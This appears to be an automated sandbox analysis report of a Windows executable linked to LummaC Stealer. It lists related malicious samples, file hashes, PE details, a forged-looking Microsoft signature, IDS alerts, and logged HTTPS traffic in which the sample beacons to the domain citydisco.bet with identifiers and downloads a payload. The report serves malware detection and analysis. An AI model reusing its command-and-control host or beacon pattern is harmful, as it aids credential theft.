	SpaceCheatFort.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	SpaceCheatFort.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.uk	Get hash	malicious	Unknown	Browse	104.17.25.14
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	https://qrsu.io/ONKMx	Get hash	malicious	Unknown	Browse	104.17.24.14
	PO_L202503042.html	Get hash	malicious	Unknown	Browse	104.18.186.31
	Dean Cartlidge_mthxvj.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	Steam.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	http://observalgerie.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.41.60
	https://trustwalletrate.com	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://scuddlecakevgzg.cfd/d7p96s	Get hash	malicious	Unknown	Browse	172.66.0.227
	Order 20201103.exe	Get hash	malicious	RedLine	Browse	104.26.13.31

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	script5.ps1	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	PO #S149102025.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	ppcore.dll.dll	Get hash	malicious	Unknown	Browse	188.114.96.3
	ppcore.dll.dll	Get hash	malicious	Unknown	Browse	188.114.96.3
	DE-10192.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	xo.bat	Get hash	malicious	Unknown	Browse	188.114.96.3
	Document25.xlsm	Get hash	malicious	ScreenConnect Tool, AsyncRAT, StormKitty, VenomRAT	Browse	188.114.96.3
	Launcher.exe	Get hash	malicious	LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	188.114.96.3
	Galaxy Swapper v2.0.3.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	dok PZ 2025-03-11_142242 fin_Orygina#U0142.xls	Get hash	malicious	Unknown	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.567462922619457
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SoftWare(1).exe1.exe
File size:	775'488 bytes
MD5:	dca5a4d306b6166c5a4d4756707712e8
SHA1:	62fada94166304380dcec9a7a980a359ba3ba101
SHA256:	ba4bd6d7a2644c76ce30c905804302afdb1d0f5c6110bdedb7d4ea400f5c74bf
SHA512:	d7fa3ac2dc08888a3254200065591275fd27c3b92fed0c72b2e480d924be01dec4d848b2b4f0d6a29f6b26b80a7abaf416b2ebae0f5912a5e1c8721ae377a855
SSDEEP:	12288:GIJQ/s2kiatVPnIpbWiJ621POPAANU/Sc+e1RoKq/T/+Kc5fBzBS0+I4d0Z2cddQ:7BnIpnJhdQAANeNboz/aKc5fr3l4dzcQ
TLSH:	C2F4D046BC91D0B3E91628B14D29E7C50C6B6B604F20C4FBBED89D646FB36E18932357
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.............................w............@.......................................@.................................P...(..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4377d2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D1BF1F [Wed Mar 12 17:06:39 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	033c5f85fb620246315503dc218ebc8c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	15/12/2020 22:24:20 02/12/2021 22:24:20
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	31F605F0D1D4BA54250DA5C719A8200C
Thumbprint SHA-1:	E8C15B4C98AD91E051EE5AF5F524A8729050B2A2
Thumbprint SHA-256:	22A3C23E08C7DBB4E7F4591E58C04285C0514C2894E3C418AD157D817D7EDF3C
Serial:	33000003DE8D56825AF1A4A9670000000003DE

Entrypoint Preview

Instruction
call 00007F0A30BAAABAh
jmp 00007F0A30BAA929h
mov ecx, dword ptr [0045F840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F0A30BAAAB6h
test esi, ecx
jne 00007F0A30BAAAD8h
call 00007F0A30BAAAE1h
mov ecx, eax
cmp ecx, edi
jne 00007F0A30BAAAB9h
mov ecx, BB40E64Fh
jmp 00007F0A30BAAAC0h
test esi, ecx
jne 00007F0A30BAAABCh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0045F840h], ecx
not ecx
pop edi
mov dword ptr [0045F880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0045C860h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0045C820h]
xor dword ptr [ebp-04h], eax
call dword ptr [0045C81Ch]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0045C8A8h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 004614D0h
call dword ptr [0045C880h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F0A30BB1605h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5c650	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb9000	0x4540	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x63000	0x276c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x58b28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x54f98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5c7c0	0x148	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x52cc0	0x52e00	b955d299ddc749adb9e2a9fa46e5dda4	False	0.5095947633861236	data	6.772334323063753	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x54000	0xa124	0xa200	147c72eee2c66963ee69f82cf3610cb3	False	0.4244068287037037	data	4.908125312415663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5f000	0x2c9c	0x1600	eab85ca8d24299491f287a6faf9660e1	False	0.4069602272727273	data	4.744736283390186	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x62000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x63000	0x276c	0x2800	ed7d506be2e46b9b1c8fde31ac68b654	False	0.7849609375	data	6.600494306172883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x66000	0x57a00	0x57a00	1e44007e28bcdbf246c2e2b1c270e288	False	1.0003231990014265	data	7.9994603439784795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T13:33:26.163727+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	188.114.96.3	443	TCP
2025-03-13T13:33:29.489608+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	188.114.96.3	443	TCP
2025-03-13T13:33:31.961306+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	188.114.96.3	443	TCP
2025-03-13T13:33:34.593625+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	188.114.96.3	443	TCP
2025-03-13T13:33:37.775399+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	188.114.96.3	443	TCP
2025-03-13T13:33:39.945687+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	188.114.96.3	443	TCP
2025-03-13T13:33:42.213724+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:33:24.835328102 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:24.835381985 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:24.835453987 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:24.837055922 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:24.837084055 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:26.163652897 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:26.163727045 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:26.412276030 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:26.412317991 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:26.412676096 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:26.456331015 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:26.470192909 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:26.470220089 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:26.470350981 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.180803061 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.180881977 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.180907965 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.180937052 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.181036949 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.181057930 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.181296110 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.181355000 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.181360960 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.187612057 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.187671900 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.187746048 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.187752962 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.187824965 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.194345951 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.194403887 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.194498062 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.196789026 CET	49705	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.196804047 CET	443	49705	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.397815943 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.397866964 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:27.397948027 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.402724028 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:27.402735949 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:29.489521980 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:29.489608049 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:29.491353989 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:29.491390944 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:29.491631985 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:29.492965937 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:29.493134975 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:29.493156910 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:29.493200064 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:29.540333033 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:30.427726984 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:30.427825928 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:30.427892923 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:30.428607941 CET	49706	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:30.428632975 CET	443	49706	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:30.658365965 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:30.658426046 CET	443	49707	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:30.658505917 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:30.659183025 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:30.659198046 CET	443	49707	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:31.961218119 CET	443	49707	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:31.961306095 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:31.996592045 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:31.996629000 CET	443	49707	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:31.996886015 CET	443	49707	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:32.016839027 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:32.020967960 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:32.021003962 CET	443	49707	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:32.021075964 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:32.064326048 CET	443	49707	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:32.896565914 CET	443	49707	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:32.896967888 CET	49707	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:33.105150938 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:33.105201006 CET	443	49708	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:33.105288982 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:33.105655909 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:33.105670929 CET	443	49708	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:34.593496084 CET	443	49708	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:34.593625069 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:34.737231016 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:34.737277031 CET	443	49708	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:34.737618923 CET	443	49708	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:34.739897966 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:34.740114927 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:34.740149021 CET	443	49708	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:34.740207911 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:34.740220070 CET	443	49708	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:35.606355906 CET	443	49708	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:35.606776953 CET	49708	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:36.374809027 CET	49709	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:36.374856949 CET	443	49709	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:36.374923944 CET	49709	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:36.375288963 CET	49709	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:36.375313997 CET	443	49709	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:37.775209904 CET	443	49709	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:37.775398970 CET	49709	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:37.776957035 CET	49709	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:37.776973009 CET	443	49709	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:37.777230978 CET	443	49709	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:37.778655052 CET	49709	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:37.778789997 CET	49709	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:37.778815031 CET	443	49709	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:38.527616978 CET	443	49709	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:38.528007030 CET	49709	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:38.684716940 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:38.684760094 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:38.684837103 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:38.685184002 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:38.685195923 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:39.945513964 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:39.945687056 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:39.947232962 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:39.947243929 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:39.947483063 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:39.948910952 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:39.948998928 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:39.949004889 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:40.756113052 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:40.756210089 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:40.756269932 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:40.757551908 CET	49710	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:40.757570982 CET	443	49710	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:40.869878054 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:40.869925976 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:40.870071888 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:40.870861053 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:40.870877981 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:42.213629961 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:42.213723898 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:42.215531111 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:42.215553045 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:42.215802908 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:42.217550039 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:42.217588902 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:42.217624903 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:42.960422039 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:42.978477955 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:42.978612900 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:42.978703022 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:42.978727102 CET	443	49712	188.114.96.3	192.168.2.5
Mar 13, 2025 13:33:42.978738070 CET	49712	443	192.168.2.5	188.114.96.3
Mar 13, 2025 13:33:42.978744030 CET	443	49712	188.114.96.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:33:24.808527946 CET	51177	53	192.168.2.5	1.1.1.1
Mar 13, 2025 13:33:24.826947927 CET	53	51177	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 13:33:24.808527946 CET	192.168.2.5	1.1.1.1	0x3b42	Standard query (0)	citydisco.bet	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 13:33:24.826947927 CET	1.1.1.1	192.168.2.5	0x3b42	No error (0)	citydisco.bet		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 13, 2025 13:33:24.826947927 CET	1.1.1.1	192.168.2.5	0x3b42	No error (0)	citydisco.bet		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

citydisco.bet

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	188.114.96.3	443	2340	C:\Users\user\Desktop\SoftWare(1).exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:26 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 97 Host: citydisco.bet
2025-03-13 12:33:26 UTC	97	OUT	Data Raw: 75 69 64 3d 37 32 63 63 63 36 39 33 33 30 65 61 39 36 37 37 30 61 39 38 66 61 64 31 31 66 33 34 31 38 66 34 63 34 39 37 31 32 61 37 65 39 63 38 63 62 63 30 66 65 63 31 39 34 37 62 26 63 69 64 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: uid=72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b&cid=b9abc76ce53b6fc3a03566f8f764f5ea
2025-03-13 12:33:27 UTC	785	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:26 GMT Content-Type: application/octet-stream Content-Length: 12882 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1V2pCwXmjOnORjCk%2FFMXl%2FEwsCqqeAmutukW7BBn9coEdWZ%2F7zxd2%2BihRn1R61rX3LaIJsk%2B3dOJV3LRqpd0v6ybqPGlVuOXvmdJWDX6KQBg%2FsM6ISpMivkAD1moRs97"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8f4d7f952324-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14387&min_rtt=14046&rtt_var=4547&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=996&delivery_rate=185831&cwnd=229&unsent_bytes=0&cid=717e7bc3a0aac15e&ts=1131&x=0"
2025-03-13 12:33:27 UTC	1369	IN	Data Raw: a3 12 73 62 7d d5 87 33 cc ab d2 e8 79 fe 80 92 3c 03 df 03 18 a5 08 36 e5 e4 60 cf 9c 56 45 d2 2f 54 30 4e 3a 24 a2 16 9b 25 de f6 33 56 e2 76 3f 61 6d e4 e9 3f f2 5a 3d 03 d2 d7 7e d9 5f 14 f0 ee 0f bb 8e 23 4d 33 80 c6 6e 18 e5 b9 4c 71 f5 43 72 08 58 57 bf b4 46 7d 6e 08 ca ae df 8e 47 b4 f4 02 4c 1a b1 47 ca 9d df 53 90 1e c7 93 f8 ed 4e 8b cf 51 fb 82 f7 bc 73 41 3b fe 36 8a cf 1e ae 42 78 43 3c a6 90 76 85 3b a6 3a a3 f8 cb f5 76 da f0 8e 30 20 aa 9e 8c 2a 61 9a 5c 26 f7 fb 37 3f 05 df 4c 3e bd 7a ab f8 2d 2e ac ce 66 4a 2b b7 e5 60 e3 0f 28 b0 4e 3b fa c9 a3 7f 2b 96 59 60 84 fa 41 40 f1 ce 88 28 05 e2 b5 61 b7 9b e4 75 8b 82 cd 41 fc d9 17 55 99 49 da 48 7e 4e ad 87 32 a6 9e b4 b7 eb 06 af 8a 13 bf e3 a3 fe b4 8e 54 bc 11 d4 d9 08 c3 28 5c fd 65 Data Ascii: sb}3y<6`VE/T0N:$%3Vv?am?Z=~_#M3nLqCrXWF}nGLGSNQsA;6BxC<v;:v0 *a\&7?L>z-.fJ+`(N;+Y`A@(auAUIH~N2T(\e
